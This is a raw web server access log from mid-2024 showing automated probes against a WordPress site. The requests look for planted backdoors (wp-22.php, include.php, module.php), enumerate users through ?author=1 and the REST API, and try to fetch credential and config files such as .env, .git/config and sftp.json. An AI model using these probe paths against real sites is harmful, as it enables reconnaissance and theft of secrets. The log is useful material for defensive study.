(KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [02/Jun/2024:07:09:06 +0700] "GET /wp-content/wp-22.php?bction=ping HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [02/Jun/2024:07:09:13 +0700] "GET /wp-admin/wp-22.php?bction=ping HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [02/Jun/2024:07:09:20 +0700] "GET /wp-includes/wp-22.php?bction=ping HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 123.57.22.224 - - [04/Jun/2024:08:10:44 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 123.57.22.224 - - [04/Jun/2024:08:10:49 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 123.57.22.224 - - [04/Jun/2024:08:10:55 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 147.185.132.156 - - [04/Jun/2024:16:39:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 206.189.157.103 - - [06/Jun/2024:10:34:50 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 64.227.170.216 - - [07/Jun/2024:08:39:27 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 198.235.24.88 - - [07/Jun/2024:17:01:24 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 205.210.31.186 - - [08/Jun/2024:08:07:21 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 139.59.35.248 - - [08/Jun/2024:08:56:47 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 139.59.35.248 - - [08/Jun/2024:08:56:51 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 139.59.35.248 - - [08/Jun/2024:08:56:53 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 54.88.179.33 - - [11/Jun/2024:10:20:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 206.189.157.103 - - [12/Jun/2024:20:47:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.50 - - [12/Jun/2024:23:11:30 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 5.42.64.25 - - [13/Jun/2024:04:57:51 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 5.42.64.25 - - [13/Jun/2024:04:58:00 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 5.42.64.25 - - [13/Jun/2024:04:58:03 +0700] "GET /wp.lautnusantara.com/.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 5.42.64.25 - - [13/Jun/2024:04:58:08 +0700] "GET /vendor/.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 91.92.252.169 - - [13/Jun/2024:11:06:30 +0700] "GET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [13/Jun/2024:20:03:29 +0700] "GET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 34.222.172.179 - - [14/Jun/2024:04:55:21 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)" 91.92.252.169 - - [14/Jun/2024:12:27:58 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jun/2024:12:28:33 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jun/2024:12:28:49 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jun/2024:12:29:10 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [15/Jun/2024:14:01:20 +0700] "GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 205.210.31.36 - - [15/Jun/2024:16:24:32 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 91.92.252.169 - - [16/Jun/2024:09:00:48 +0700] "GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 115.231.78.8 - - [17/Jun/2024:07:40:08 +0700] "GET /login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 91.92.252.169 - - [18/Jun/2024:20:48:57 +0700] "GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 35.171.144.152 - - [19/Jun/2024:17:24:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 45.148.10.59 - - [20/Jun/2024:04:07:06 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/74.0.3729.121 Mobile/15E148 Safari/605.1" 124.236.100.56 - - [20/Jun/2024:07:48:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" 124.236.100.56 - - [20/Jun/2024:08:22:29 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" 62.60.160.64 - - [21/Jun/2024:04:53:12 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 62.60.160.64 - - [21/Jun/2024:04:53:20 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 62.60.160.64 - - [21/Jun/2024:04:53:27 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 162.142.125.32 - - [21/Jun/2024:07:00:26 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 147.185.132.15 - - [21/Jun/2024:09:04:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [21/Jun/2024:11:45:39 +0700] "GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 142.93.96.91 - - [21/Jun/2024:14:49:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 35.171.144.152 - - [22/Jun/2024:06:38:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 54.39.17.116 - - [22/Jun/2024:12:21:17 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 54.39.17.116 - - [22/Jun/2024:12:21:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 54.39.17.116 - - [22/Jun/2024:12:21:29 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 198.235.24.11 - - [23/Jun/2024:21:57:16 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 161.35.215.217 - - [24/Jun/2024:06:41:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 139.59.73.43 - - [26/Jun/2024:01:37:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 91.92.252.169 - - [26/Jun/2024:03:37:25 +0700] "GET /wp-content/plugins/download-plugin/wp-access.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 164.92.185.52 - - [26/Jun/2024:05:23:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 69.163.181.251 - - [26/Jun/2024:10:51:16 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 69.163.181.251 - - [26/Jun/2024:10:51:21 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 69.163.181.251 - - [26/Jun/2024:10:51:25 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 147.185.132.210 - - [26/Jun/2024:13:09:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 44.213.116.199 - - [26/Jun/2024:16:23:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 64.23.254.25 - - [28/Jun/2024:01:43:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 145.220.91.19 - - [28/Jun/2024:09:35:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 91.92.250.161 - - [28/Jun/2024:22:35:45 +0700] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 205.210.31.42 - - [29/Jun/2024:12:45:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 103.47.185.185 - - [30/Jun/2024:02:26:59 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.47.185.185 - - [30/Jun/2024:02:27:04 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.47.185.185 - - [30/Jun/2024:02:27:07 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 205.210.31.144 - - [30/Jun/2024:02:36:33 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 87.236.176.138 - - [30/Jun/2024:12:04:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 45.148.10.59 - - [01/Jul/2024:14:45:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 8.0.0; LG-H873) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" 3.250.132.219 - - [02/Jul/2024:01:38:26 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 205.210.31.177 - - [02/Jul/2024:09:57:11 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 43.155.89.190 - - [03/Jul/2024:01:45:16 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 43.155.89.190 - - [03/Jul/2024:01:45:19 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 43.155.89.190 - - [03/Jul/2024:01:45:22 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [03/Jul/2024:17:36:52 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [03/Jul/2024:17:36:53 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [03/Jul/2024:17:36:57 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [03/Jul/2024:17:36:59 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [04/Jul/2024:12:51:20 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [04/Jul/2024:12:51:22 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [04/Jul/2024:12:51:23 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [04/Jul/2024:12:51:24 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 143.110.209.198 - - [05/Jul/2024:19:26:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 205.210.31.138 - - [05/Jul/2024:21:54:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 5.101.156.211 - - [06/Jul/2024:07:40:17 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 5.101.156.211 - - [06/Jul/2024:07:40:21 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 5.101.156.211 - - [06/Jul/2024:07:40:25 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 205.210.31.139 - - [06/Jul/2024:12:45:37 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 206.168.34.219 - - [07/Jul/2024:14:29:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 199.45.155.104 - - [09/Jul/2024:03:20:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.19 - - [10/Jul/2024:14:51:29 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 162.142.125.200 - - [10/Jul/2024:16:42:25 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.22 - - [14/Jul/2024:20:51:23 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 45.196.45.137 - - [16/Jul/2024:07:35:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 43.153.216.45 - - [16/Jul/2024:07:35:33 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 35.88.46.14 - - [16/Jul/2024:14:30:12 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)" 35.171.144.152 - - [18/Jul/2024:16:51:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 165.232.102.154 - - [19/Jul/2024:08:10:36 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 92.118.39.244 - - [19/Jul/2024:20:37:18 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2" 147.185.132.252 - - [19/Jul/2024:21:32:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 23.178.112.215 - - [20/Jul/2024:10:17:41 +0700] "GET /.well-known/acme-challenge/74lWIla-oqMbeba2Cu1SGenijRbI5WCiTB45RUqNKLc HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 54.169.155.217 - - [20/Jul/2024:10:17:44 +0700] "GET /.well-known/acme-challenge/74lWIla-oqMbeba2Cu1SGenijRbI5WCiTB45RUqNKLc HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 13.60.43.82 - - [20/Jul/2024:10:17:44 +0700] "GET /.well-known/acme-challenge/74lWIla-oqMbeba2Cu1SGenijRbI5WCiTB45RUqNKLc HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 35.89.195.112 - - [20/Jul/2024:10:17:44 +0700] "GET /.well-known/acme-challenge/74lWIla-oqMbeba2Cu1SGenijRbI5WCiTB45RUqNKLc HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.22.130.85 - - [20/Jul/2024:10:17:45 +0700] "GET /.well-known/acme-challenge/74lWIla-oqMbeba2Cu1SGenijRbI5WCiTB45RUqNKLc HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 138.197.191.87 - - [20/Jul/2024:10:17:58 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 138.197.191.87 - - [20/Jul/2024:10:17:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084438) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 138.197.191.87 - - [20/Jul/2024:10:17:58 +0700] "GET /server HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:17:59 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:17:59 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:00 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:00 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:00 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:01 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:01 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:02 +0700] "GET /_all_dbs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (l9scan/2.0.633323e223e2335313e2330313; +https://leakix.net)" 138.197.191.87 - - [20/Jul/2024:10:18:02 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:03 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:03 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:03 +0700] "GET /s/633323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:04 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:04 +0700] "GET 